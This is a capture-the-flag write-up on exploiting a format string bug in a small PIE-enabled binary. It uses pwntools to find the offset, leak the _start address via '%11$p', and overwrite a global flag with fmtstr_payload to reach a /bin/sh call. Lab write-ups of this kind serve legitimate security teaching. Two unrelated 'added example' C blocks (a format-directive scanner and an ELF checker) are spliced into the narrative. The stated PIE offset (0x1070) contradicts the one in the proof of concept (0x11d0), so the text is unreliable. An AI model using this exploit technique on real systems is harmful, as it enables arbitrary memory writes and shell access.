fmtstr
Decompile Main Function

The main function reads input from the user and prints it back.
On line 4 there is a format string bug.
On line 5 there is a condition: if the variable shell is not equal to 1, the get_shell function is called. That function is simple, it just executes /bin/sh.
Let me see which protections are enabled on the program.
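To make the bug on line 4 concrete from the defender's side, here is an added example (not the writeup's binary, whose main() is only shown in the decompiler screenshot): a hypothetical echo routine in its hardened form, with the vulnerable pattern kept as a comment, plus a small scanner that counts format directives in untrusted input so that probes like the "%11$p" used later in this writeup stand out in logged input. Function names and the scan struct are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical echo routine standing in for the writeup's main(): the real
 * binary prints the user's line and then checks a global "shell" flag.
 * The bug the writeup exploits is this form, shown only as a comment
 * because calling it with attacker-controlled data is undefined behaviour:
 *
 *     printf(buf);          // user input IS the format string
 *
 * The fix is to make the format a constant and pass the input as data. */
int echo_fixed(const char *user, char *out, size_t outlen)
{
    return snprintf(out, outlen, "%s", user);
}

/* Returns 1 when echo_fixed reproduces the input byte-for-byte, i.e. no
 * directive in it was interpreted. */
int echo_preserves_input(const char *user)
{
    char out[512];
    echo_fixed(user, out, sizeof out);
    return strcmp(out, user) == 0;
}

typedef struct {
    int directives;   /* '%' conversions, not counting the literal "%%" */
    int positional;   /* conversions that pick an argument with "N$" */
    int writes;       /* "%n" conversions, the only ones that write memory */
} fmt_scan;

/* Detection-side scan of untrusted input. A probe such as "%11$p" shows up
 * as one positional read; an exploit attempt contains "%n" writes. */
fmt_scan scan_format_directives(const char *s)
{
    fmt_scan r = {0, 0, 0};
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }   /* "%%" prints a percent sign */
        r.directives++;
        const char *q = p + 1;
        while (*q >= '0' && *q <= '9') q++;   /* width, or the N of "N$" */
        if (*q == '$') r.positional++;
        /* skip flags, width, precision and length modifiers */
        while (*q && strchr("0123456789$#-+ .*hlLqjzt", *q)) q++;
        if (*q == 'n') r.writes++;
        if (*q == '\0') break;                /* input ended mid-directive */
        p = q;                                /* resume after the conversion */
    }
    return r;
}

/* Stand-alone use: reads one line, reports the scan, echoes it safely. */
int main(void)
{
    char line[512];
    if (!fgets(line, sizeof line, stdin)) return 1;
    line[strcspn(line, "\n")] = '\0';
    fmt_scan r = scan_format_directives(line);
    printf("directives=%d positional=%d writes=%d\n",
           r.directives, r.positional, r.writes);
    char out[512];
    echo_fixed(line, out, sizeof out);
    printf("%s\n", out);
    return 0;
}
```

Compiling the original pattern with -Wformat -Wformat-security makes gcc and clang warn on the non-literal format, which is the cheapest way to catch this class of bug before it ships.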

NX and PIE are enabled.
PIE is a protection that randomizes the load address of the program's own code (its functions and instructions), similar to what ASLR does for the stack, heap and libraries; ASLR by itself does not randomize the program's functions and instructions. PIE only takes effect if ASLR is enabled.
NX makes the stack permissions RW without X, so if there is a buffer overflow you can't put shellcode on the stack and execute it.
Now let's find the format string offset.
Use pwntools to find the offset:
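Both of these protections are recorded in the ELF headers, which is exactly where checksec reads them from. The following added example (not code from the writeup) reimplements that check in C: PIE is the file type ET_DYN, and NX is a PT_GNU_STACK program header without the PF_X flag. It assumes a Linux/glibc elf.h and parses an image held in memory; the build_sample_elf helper constructs a minimal header so the checker can be exercised with no binary on disk.

```c
#include <elf.h>       /* assumed: Linux/glibc ELF definitions */
#include <stdio.h>
#include <string.h>

typedef struct {
    int valid;   /* 1 when the bytes look like an ELF64 image */
    int pie;     /* 1 when e_type is ET_DYN (position-independent executable) */
    int nx;      /* 1 when PT_GNU_STACK is present and lacks PF_X */
} elf_protections;

/* Inspect an ELF64 image held in memory. PIE is a property of the file
 * type, NX a property of the GNU_STACK program header. A missing
 * GNU_STACK header counts as no NX here. */
elf_protections check_elf64(const unsigned char *img, size_t len)
{
    elf_protections r = {0, 0, 0};
    if (len < sizeof(Elf64_Ehdr)) return r;
    if (memcmp(img, ELFMAG, SELFMAG) != 0 || img[EI_CLASS] != ELFCLASS64) return r;
    Elf64_Ehdr eh;
    memcpy(&eh, img, sizeof eh);   /* copy: the buffer may be unaligned */
    r.valid = 1;
    r.pie = (eh.e_type == ET_DYN);
    for (unsigned i = 0; i < eh.e_phnum; i++) {
        size_t off = (size_t)eh.e_phoff + (size_t)i * eh.e_phentsize;
        if (off + sizeof(Elf64_Phdr) > len) break;
        Elf64_Phdr ph;
        memcpy(&ph, img + off, sizeof ph);
        if (ph.p_type == PT_GNU_STACK) {
            r.nx = !(ph.p_flags & PF_X);
            break;
        }
    }
    return r;
}

/* Constructed sample: minimal ELF64 header plus one GNU_STACK phdr. */
size_t build_sample_elf(unsigned char *buf, size_t len, int pie, int exec_stack)
{
    size_t need = sizeof(Elf64_Ehdr) + sizeof(Elf64_Phdr);
    if (len < need) return 0;
    Elf64_Ehdr eh;
    Elf64_Phdr ph;
    memset(&eh, 0, sizeof eh);
    memset(&ph, 0, sizeof ph);
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS] = ELFCLASS64;
    eh.e_ident[EI_DATA] = ELFDATA2LSB;
    eh.e_ident[EI_VERSION] = EV_CURRENT;
    eh.e_type = pie ? ET_DYN : ET_EXEC;
    eh.e_machine = EM_X86_64;
    eh.e_phoff = sizeof(Elf64_Ehdr);
    eh.e_ehsize = sizeof(Elf64_Ehdr);
    eh.e_phentsize = sizeof(Elf64_Phdr);
    eh.e_phnum = 1;
    ph.p_type = PT_GNU_STACK;
    ph.p_flags = PF_R | PF_W | (exec_stack ? PF_X : 0);
    memcpy(buf, &eh, sizeof eh);
    memcpy(buf + sizeof eh, &ph, sizeof ph);
    return need;
}

/* Convenience for tests: returns pie*2 + nx for a constructed image, -1 if invalid. */
int sample_flags(int pie, int exec_stack)
{
    unsigned char buf[256];
    size_t n = build_sample_elf(buf, sizeof buf, pie, exec_stack);
    elf_protections r = check_elf64(buf, n);
    return r.valid ? ((r.pie << 1) | r.nx) : -1;
}

/* Stand-alone use: ./a.out ./fmtstr (only the first MiB is read; the
 * headers live at the start of the file). */
int main(int argc, char **argv)
{
    if (argc < 2) { fprintf(stderr, "usage: %s <elf-file>\n", argv[0]); return 2; }
    static unsigned char img[1 << 20];
    FILE *f = fopen(argv[1], "rb");
    if (!f) { perror("fopen"); return 1; }
    size_t n = fread(img, 1, sizeof img, f);
    fclose(f);
    elf_protections r = check_elf64(img, n);
    if (!r.valid) { fprintf(stderr, "not an ELF64 image\n"); return 1; }
    printf("PIE: %s\nNX:  %s\n", r.pie ? "enabled" : "disabled",
           r.nx ? "enabled" : "disabled");
    return 0;
}
```

The same two fields are what pwntools reads when ELF('fmtstr', checksec=True) prints its summary, so the script below and this checker should agree on any binary.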
from pwn import *

io = process("./fmtstr")
context.arch = 'amd64'
elf = context.binary = ELF('fmtstr', checksec=True)
context.log_level = 'info'

# Send one probe and return the program's echo of it (the binary prints one line per input)
def send_payload(payload):
    io.sendline(payload)
    return io.recvline().strip()

# FmtStr sends its own probe payloads through send_payload and logs the offset it finds
format_string = FmtStr(execute_fmt=send_payload)
Now run the script:

It works: the offset is 6.
Now try to leak the PIE base so the shell variable can be changed from 1 to anything else, which makes the program execute /bin/sh.
Stack entry number 11 (%11$p) holds the address of the _start function:
┌──(root㉿kali)-[~/TestArena]
└─# ./fmtstr
%11$p
0x560630a5e070
Now compute the difference between the _start address and the PIE base to get the ELF base address.

So to get the PIE base, leak entry number 11 and subtract 0x1070 from it.
Now get the offset of the shell variable, so its real address can be computed and its value changed from 1 to anything else.

Now let's change the value of the variable.
I wrote this POC to change the variable value:
from pwn import *

io = process("./fmtstr")
context.arch = 'amd64'
elf = context.binary = ELF('fmtstr', checksec=True)
context.log_level = 'info'

# Send one payload and return the program's echo of it
def send_payload(payload):
    io.sendline(payload)
    return io.recvline().strip()

# Runs the offset probes again (the offset found earlier, 6, is used below)
format_string = FmtStr(execute_fmt=send_payload)

# Leak stack entry 11 (_start) and subtract its offset inside the binary to get the ELF base
io.sendline(b"%11$p")
leak = int(io.recvline().strip(), 16) - 0x11d0
log.success(f"ELF Address: {hex(leak)}")

# The shell variable sits at a fixed offset from the base
shell = leak + 0x4040
log.success(f"shell: {hex(shell)}")

# Build a format string write (offset 6) that sets shell to 0x1337, so shell != 1 and get_shell runs
payload = fmtstr_payload(6, {shell: 0x1337})
io.sendline(payload)
io.interactive()

I hope you enjoyed it.